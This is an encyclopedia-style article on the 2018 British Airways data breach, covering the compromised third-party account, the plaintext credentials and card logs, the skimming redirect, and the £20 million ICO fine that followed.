British Airways data breach

In summer 2018, a data breach affected almost 500,000 customers of British Airways, of which almost 250,000 had their names, addresses, credit card numbers and CVV cards stolen. The attack gained access to British Airways systems via the account of a compromised third party and escalated their account privileges after finding an unsecured administrator password. The attacker stole data that British Airway's was improperly recording and also redirected users of British Airways site to a bogus one that was designed to steal more data. In October 2020 the ICO fined British Airways £20 million for breaches of GDPR related to the breach.

Attack

On June 22nd 2018, an attacker gained access to British Airways Network by means of compromised credientials from an employee of Swissport, a third party cargo handler.^[1] The compromised account did not have Multi-factor authentication enabled.^[1]

The attacker was initially restricted to a citrix enviroment, but successfully broke out of the enviroment by means that BA have not released.^[1] After breaking out of the enviroment, the attacker was able use escalate their privilege after finding an administrator password stored in plaintext on the server.^[1]

On 26 July 2018, the attacker found plaintext files, containing payment card details for BA redemption transactions. The ICO's report highlighted this as follows:

The logging and storing of these card details (including, in most cases, CVV numbers) was not an intended design feature of BA's systems and was not required for any particular business purpose.

It was a testing feature that was only intended to operate when the systems were not live, but which was left activated when the

systems went live. BA has explained that this card data was being stored in plaintext (as opposed to in encrypted form) as a result of

human error. This error meant that the system had been unnecessarily logging payment card details since December 2015.

The impact of this failure was mitigated to some extent by the fact that the retention period of the logs was 95 days, which meant that

the only accessible card details were those logged within the preceding 95 days. Nevertheless, the details of approximately 108,000 payment cards were potentially available to the Attacker.^[1]

From the 21st of August, the attacker redirected all vistor's to BA's website to a website controled by the attacker. This website had the effect of Skimming customer payment information that was then redirected to BA's own site. The bogus site was active until 5th of September.^[2][1]

On 5th of September a third party informed BA of the bogus website. Within 90 minutes the malicious code had been removed from the site. On the 6th of September BA informed the ICO, and 500,000 affected customers^[1]

British Airways said the attack affected bookings from 21 August 2018 to 5 September 2018 with credit card details of around 380,000 total customers being compromised.^[3] The attackers obtained names, street addresses, email addresses, credit card numbers, expiration dates and card security codes – enough to allow thieves to steal from accounts.^[3] 77,000 customers had their name, address, email address and detailed payment information taken, while 108,000 people had personal details compromised which did not include CVV numbers.^[4]

Aftermath

Of the 500,000 victims of the breech, 250,000 had their names, addresses, card numbers, and CVV numbers taken. The remainder of the victims lost less personal information.^[1]

British Airways urged customers to contact their banks or credit card issuer and to follow their advice.^[3] NatWest said that it received more calls than usual because of the breach.^[3] American Express said that customers would not need to take any action and that they would alert customers with unusual activity on their cards.^[3]

Consequences for British Airways

In October 2020 British Airways was fined £20 million by the Information Commissioner's Office.^[5]

See also

• EasyJet data breach

References

1. ICO. "ICO - action we've taken - BA" (PDF).
2. Wittkop, Jeremy (2022-03-10). The Cybersecurity Playbook for Modern Enterprises: An end-to-end guide to preventing data breaches and cyber attacks. Packt Publishing Ltd. ISBN 978-1-80323-755-8.
3. Sandle, Paul (6 September 2018). "BA apologizes after 380,000 customers hit in cyber attack". Reuters.
4. "BA investigation into website hack reveals more victims". BBC News. 2018-10-25. Retrieved 2022-11-04.
5. Tidy, Joe (16 October 2020). "British Airways fined £20m over data breach". BBC News. Retrieved 16 October 2020.